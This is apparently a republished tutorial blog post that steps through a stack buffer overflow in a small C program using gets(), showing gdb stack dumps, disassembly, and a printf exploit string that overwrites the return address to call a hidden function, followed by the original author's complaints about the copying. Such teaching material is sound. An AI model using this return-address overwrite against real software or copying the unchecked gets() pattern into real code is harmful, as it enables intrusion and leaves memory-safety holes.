Trang chủ » C/C++ » Examining a Buffer Overflow in C and assembly with gdb

Examining a Buffer Overflow in C and assembly with gdb


I’ve now finished Vivek Ramachandran’s Assembly Primer for Hackers and I’ve decided to move on to his Buffer Overflow Primer. I’ve exploited basic buffer overflows before, but I think going through his videos will give me more perspective now that I’ve brushed up on assembly.

In this article I’ll be stepping through the program in Vivek’s first video and providing some additional tips and tricks that I find useful when reviewing the program in gdb. I’m also on a 64-bit machine, so things are a bit different in gdb for me than they are in the video. Therefore it’s better that I write up my own explanations as I grasp the material so when I review later it will be more clear.

Buffer Overflow

Wikipedia describes a buffer overflow as “an anomaly where a program, while writing data to a buffer, overruns the buffer’s boundary and overwrites adjacent memory.” When writing software you define all sorts of buffers where data can be stored. If the boundaries of these buffers are not explicitly checked, the program may continue to write data beyond the end of the buffer. But if data is written beyond the end of a buffer, where does it go? Well, it starts overwriting data in other memory locations; or in some cases it may try to write to memory locations that it doesn’t have access to and the operating system may return an exception to the program or kill it.

How to exploit it

Well, we know that a buffer overflow involves overwriting memory locations outside the buffer. Typically you exploit a buffer overflow in an application by doing exactly this. The difficulty in writing a buffer overflow exploit is in determining which memory locations you are able to overwrite and how overwriting those locations can benefit you. Typically what you’re trying to do is force the application to jump to another location in memory and execute the instructions there instead of the instructions that it would normally execute. For instance, you might be trying to get the program to jump to a root shell. A few ways you might do this are:

  • Overwrite a local variable that affects the workflow of the program by causing it to branch in a way that is beneficial to the attacker.
  • Overwrite the return address on the stack. As soon as the current function calls ret the return address is popped back off the stack into EIP and executed.
  • Overwrite a function pointer or an exception handler. As soon as the function is called or the exception is thrown your code will execute instead.

The code

This is the C code that I’m compiling and reviewing in gdb.

GetInput.c: the ‘gets’ function is used here so we can observe a buffer overflow

#include<stdio.h>

CanNeverExecute()

{

printf("I can never execute\n");

exit(0);

}

GetInput()

{

char buffer[8];

gets(buffer);

puts(buffer);

}

main()

{

GetInput();

return 0;

}

Compiling the code

On my 64-bit machine I compile the code using -ggdb to enable debugging information. I also use -fno-stack-protector to disable stack protection.

gcc -ggdb -fno-stack-protector -o GetInput GetInput.c

Running the vulnerable program

You’ll notice that when calling gets we pass it an 8 byte buffer (char buffer[8]). Executing the program and typing ‘overflo’ works without a hitch since it’s only 7 characters long.

# ./GetInput

overflo

overflo

But if you start feeding it more characters you’ll almost surely see a segmentation fault. The number of characters you have to type to get a segfault could vary depending on your CPU and your compiler, but something like ‘overflow the buffer’ should do the trick.

# ./GetInput

overflow the buffer

overflow the buffer

Segmentation fault

Exploit type

This particular code is vulnerable to a stack overflow. The gets function is not safe to use because it takes any number of characters from stdin and puts them into the buffer regardless of the size of the buffer. As you can see from the execution above we tried to place 19 characters into the buffer. On top of that the gets function will also place a null character at the end of the buffer to signal the end of the string. You obviously cannot fit 20 bytes into an 8-byte buffer, so we overwrote 12 bytes of data in memory.

Because the buffer variable is a local variable within the GetInput function, it will be stored on the stack. Based on that we know that reasoning, we know that a stack overflow is occurring. So if we wanted to exploit it we would probably just need to overwrite the return address pointer or EIP.

Analyzing the program in gdb

Digging in

Let’s understand how this overflow actually works and how you could do nasty things with it. To start, load up the program in gdb.

gdb ./GetInput

Setting breakpoints

We know that gets is not a safe function to use because it takes any number of characters and puts them into the buffer regardless of the size of the buffer. I think it would be most helpful for us to set a breakpoint just before the call to the GetInput method and just before the call to gets.

list

  {

      char buffer[8];

     gets(buffer);

     puts(buffer);

}

main() {  

GetInput();

return 0;

}

(gdb) break 19

Breakpoint 1 at 0x4005f2: file GetInput.c, line 19.

(gdb) break 13

Breakpoint 2 at 0x4005d4: file GetInput.c, line 13.

Running the program

Let’s go ahead and run the program now that we have the breakpoints.

(gdb) run

Starting program: /root/c/GetInput

Breakpoint 1, main () at GetInput.c:19

19      GetInput();

Examining the stack before the call to GetInput

Because this is a stack overflow, it’s important to review the stack before we call GetInput.

The stack before calling GetInput

(gdb) x/8xg $rsp

0x7fffffffe3f0: 0x0000000000000000  0x00007ffff7a78c4d

0x7fffffffe400: 0x0000000000000000  0x00007fffffffe4d8

0x7fffffffe410: 0x0000000100000000  0x00000000004005ee

0x7fffffffe420: 0x0000000000000000  0x27697451f3069404

At the top of the stack is 0×0 followed by 0x00007ffff7a78c4d.

Examining the stack after the call to GetInput

Now let’s step into the call to GetInput and examine the stack again to see what’s changed.

The stack after calling GetInput

(gdb) s

Breakpoint 2, GetInput () at GetInput.c:13

13      gets(buffer);

(gdb) x/8xg $rsp

0x7fffffffe3d0: 0x0000000000000000  0x00000000004004d0

0x7fffffffe3e0: 0x00007fffffffe3f0  0x00000000004005fc

0x7fffffffe3f0: 0x0000000000000000  0x00007ffff7a78c4d

0x7fffffffe400: 0x0000000000000000  0x00007fffffffe4d8

So if we look for the 0×0 followed by 0x00007ffff7a78c4d again, we can see they’re still visible at the second-to-last line, but they’re now further down the stack. It looks like we’ve added 32 bytes to the stack here. Based on the code you should have a pretty good idea of why, but let’s review it in gdb to be sure.

What was added to the stack when calling GetInput

The answers are simple, but I’ll explain them in detail so this section is a doozy. Let’s start by looking at our current stack frame (the frame for GetInput).

GetInput’s stack frame

(gdb) info f

Stack level 0, frame at 0x7fffffffe3f0:

rip = 0x4005d4 in GetInput (GetInput.c:13); saved rip 0x4005fc

called by frame at 0x7fffffffe400

source language c.

Arglist at 0x7fffffffe3e0, args:

Locals at 0x7fffffffe3e0, Previous frame's sp is 0x7fffffffe3f0

Saved registers:

rbp at 0x7fffffffe3e0, rip at 0x7fffffffe3e8

If you look at the first highlighted line above, you’ll see where it says saved rip 0x4005fc. If you look at the 4th position on the stack you’ll see that this matches. That’s because when we called GetInput the return address to get back to main was stored on the stack. You can see this even further by disassembling main:

Main’s compiler-generated assembly code

(gdb) disas main

Dump of assembler code for function main:

0x00000000004005ee <+0>:   push   %rbp

0x00000000004005ef <+1>:   mov    %rsp,%rbp

0x00000000004005f2 <+4>:   mov    $0x0,%eax

0x00000000004005f7 <+9>:   callq  0x4005cc <GetInput>

0x00000000004005fc <+14>:  mov    $0x0,%eax

0x0000000000400601 <+19>:  leaveq

0x0000000000400602 <+20>:  retq

End of assembler dump.

Notice the highlighted line is the return memory address on the stack and is, of course, the line right after the call to GetInput. When GetInput calls ret it will return to this location.

Now if you take another look at GetInput’s stack frame, you’ll see I highlighted a second line that says Previous frame’s sp is 0x7fffffffe3f0. This is the stack pointer for main‘s stack frame and is also seen on the stack after the call to GetInput. This is because the first operation of any good function is to push the base pointer onto the stack. If you disassemble GetInput you’ll see that’s exactly what it did.

GetInput’s compiler-generated assembly code

(gdb) disas GetInput

Dump of assembler code for function GetInput:

0x00000000004005cc <+0>:   push   %rbp

0x00000000004005cd <+1>:   mov    %rsp,%rbp

0x00000000004005d0 <+4>:   sub    $0x10,%rsp

=> 0x00000000004005d4 <+8>:    lea    -0x10(%rbp),%rax

0x00000000004005d8 <+12>:  mov    %rax,%rdi

0x00000000004005db <+15>:  callq  0x4004c0 <gets@plt>

0x00000000004005e0 <+20>:  lea    -0x10(%rbp),%rax

0x00000000004005e4 <+24>:  mov    %rax,%rdi

0x00000000004005e7 <+27>:  callq  0x400490 <puts@plt>

0x00000000004005ec <+32>:  leaveq

0x00000000004005ed <+33>:  retq

End of assembler dump.

So as you can see at the first highlighted line above, GetInput did clearly push the base pointer onto the stack, which is what we saw when examining the stack.

That only leaves the other mysterious 16 bytes at the top of the stack. What are those for? Well, if you review the second highlighted line above you’ll see where the assembly code asks the cpu to subtract 0×10 from the stack pointer. If you do the math there, that’s 16 in decimal. So the stack pointer was adjusted by 16 bytes, which is to make room for buffer, the local variable we defined. Of course we only defined an 8-byte, but I can only presume I was allotted 16 due to my 64-bit machine. I’m sure I’ll eventually learn the answer to this. :)

Why isn’t the buffer 0?

You also may be wondering why the buffer isn’t defined to 0, but instead appears to have some miscellaneous data in it.

buffer, the local variable in GetInput

(gdb) x/2xg $rsp

0x7fffffffe3d0: 0x0000000000000000  0x00000000004004d0

Well, the answer to that is simple; we didn’t ask for it to be 0. As you can see in the assembly code, the stack pointer was just adjusted to make 16 bytes available on the stack. Therefore, the next 16 bytes are now made available. We haven’t set buffer to any value and in C this means the value is indeterminate! In other words, whatever values happened to be in that memory location are still there[1].

No more gdb

Now that we’ve determined the condition of the stack I think we know enough to exploit the program. You can go ahead and close gdb.

Visualizing the buffer overflow

Here is basically what our stack looks like in visual form (I based the representation on Aleph One’s):

The program’s stack

bottom of  DDDDDDDDDDDDEEEE  EEEEEEEE  EEEEFFFF  FFFFFFFF  FFFFFFFF     top of

memory     89ABCDEF01234567  89ABCDEF  01234567  89ABCDEF  01234567     memory

buffer            ebp       ret       a         b

<-------   [A-16-BYTE-BUFFER][0x010101][0x010101][        ][        ]

top of                                                                  bottom of

stack                                                                   stack

So, when feeding data into the gets function, the first 16 bytes will go into our buffer on the stack. The next 8 bytes will go into the stored base pointer. And the next 8 bytes will go into the return pointer. The best way to exploit this application would be to overwrite the return address to point to another location.

Thinking about the exploit string

We’ve counted the bytes, so we know now that we need 16 bytes + 8 bytes to fill up the buffer and ebp. Then to run code we need an 8 byte memory address that points to the code we want to run. So the string needs to look something like this:

aaaaaaaaaaaaaaaaaaaaaaaaXXXXXXXX

The only problem now is we need to fill in the X’s with a memory address of some code to execute. Because this is a sample program, there was a method called CanNeverExecute intentionally added that will never run under normal circumstances. To demonstrate how a buffer overflow redirects program flow we’ll point the return address to this function to cause it to run. Let’s take a look at the method to get it’s memory location.

CanNeverExecute’s compiler-generated assembly code

(gdb) disas CanNeverExecute

Dump of assembler code for function CanNeverExecute:

0x00000000004005b4 <+0>:   push   %rbp

0x00000000004005b5 <+1>:   mov    %rsp,%rbp

0x00000000004005b8 <+4>:   mov    $0x4006fc,%edi

0x00000000004005bd <+9>:   callq  0x400490 <puts@plt>

0x00000000004005c2 <+14>:  mov    $0x0,%edi

0x00000000004005c7 <+19>:  callq  0x4004a0 <exit@plt>

End of assembler dump.

We can see that the first line of CanNeverExecute is at the memory location 0x4005b4, so if we wanted to execute this method that’s the memory address we’ll need to provide to gets.

But how do you put a memory address into a string? Typing the hexadecimal numbers in the string would simply treat them as their ascii representations, so something like this will not work.

aaaaaaaaaaaaaaaaaaaaaaaa4005b4

Placing hexademical into a string

There are numerous ways to do this, but the easiest way to do this in linux is to use the printf command from bash, which works just like it does in C.

# printf '\x30\x31\x32\n'

012

This particular example just prints out 0, 1, and 2. But you can use this to print anything as a string. If you don’t believe it, try this one:

# printf '\xaa\xab\xac\n'

Crafting the exploit string

Now that we can put hex values into a string, we’re ready to create the exploit. If you’re anxious you may have already started typing, thinking it’s one of these:

aaaaaaaaaaaaaaaaaaaaaaaa\x40\x05\xb4

aaaaaaaaaaaaaaaaaaaaaaaa\x00\x00\x00\x00\x00\x40\x05\xb4

But which one is it!? Actually..

They’re both wrong!

Chances are if you’re reading this article you’re running on an x86 or x86-64 processor, so data is stored in memory in reverse order!

This sounds confusing, but what this means is just that we need to put the memory address into the string backwards so that when the CPU pops it back off the stack it will read it forwards. So now our exploit string becomes:

aaaaaaaaaaaaaaaaaaaaaaaa\xb4\x05\x40\x00\x00\x00\x00\x00

OMG I’m an ub3r h4x0r, let’s pwn this program!

Wow, you’re really excited about this, huh? Ok, well let’s try this out and see if the exploit works. We’ll just pipe the output from printf into the GetInput program to see if the return address is overwritten properly.

# printf "aaaaaaaaaaaaaaaaaaaaaaaa\xb4\x05\x40\x00\x00\x00\x00\x00" | ./GetInput

aaaaaaaaaaaaaaaaaaaaaaaa�@

I can never execute

What do you know.. the CanNeverExecute method ran as expected and printed “I can never execute”. So.. the exploit works! I guess you’re an ub3r h4x0r now.

Finish Line

Well, you’re ub3r 1337 now, so go forth and prosper! I’m sure you’ll see more buffer overflow articles from me soon, so be on the lookout if you’re looking to learn more.

Source :http://www.techblogistech.com/2011/08/examining-a-buffer-overflow-in-c-and-assembly-with-gdb/

4 thoughts on “Examining a Buffer Overflow in C and assembly with gdb

  1. Cool, so you stole my article, didn’t bother to give me any credit on this page, but then still allowed the WordPress trackback to reach my blog so I would know you stole this from me. On top of that I wouldn’t be surprised if you’re using a bot to scrape articles since the formatting here is wrong and makes the article less clear to follow.

    Thanks for being a jackass.😦

  2. You still took the ENTIRE content of my original article and placed it here on your site. A small source link at the bottom of the post does not make it ok to repost an article I spent hours putting together. Writing a review and linking to the original content would be fine, but taking the whole thing is pretty much like stealing. I’m all for freedom of information, but honestly…

Bình luận

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s